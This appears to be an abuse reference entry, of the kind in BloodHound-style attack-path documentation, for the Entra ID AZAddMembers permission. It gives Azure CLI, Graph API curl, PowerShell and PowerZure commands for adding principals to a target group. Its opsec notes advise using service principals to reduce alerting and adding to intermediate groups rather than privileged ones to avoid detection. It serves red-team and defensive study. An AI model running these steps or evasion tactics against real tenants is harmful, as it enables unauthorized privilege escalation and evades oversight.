AZAddMembers
The source principal can add any principal as a member of the target Entra ID group.
Applies to: User / ServicePrincipal / Group β AZGroup
Linux Abuse
Azure CLI
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad group member add --group <target-group-id> --member-id <object-id>
Graph API (curl)
TOKEN=$(curl -s -X POST \
"https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
-d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
| jq -r '.access_token')
curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"
Windows Abuse
Microsoft.Graph PowerShell
Connect-MgGraph -AccessToken <access-token>
New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>
AzureAD PowerShell (legacy)
Connect-AzureAD -AccountId <username> -AadAccessToken <access-token>
Add-AzureADGroupMember -ObjectId <target-group-id> -RefObjectId <object-id>
PowerZure
Add-AzureADGroup -User <target-user-upn> -Group '<group-display-name>'
Opsec
- Entra ID audit log records: actor, target group, added principal, date/time.
- Use a service principal rather than an interactive user to reduce alerting.
- Adding attacker-controlled SP to a privileged group (e.g. Global Admins) is high-signal; prefer adding to intermediate groups that inherit the target privilege.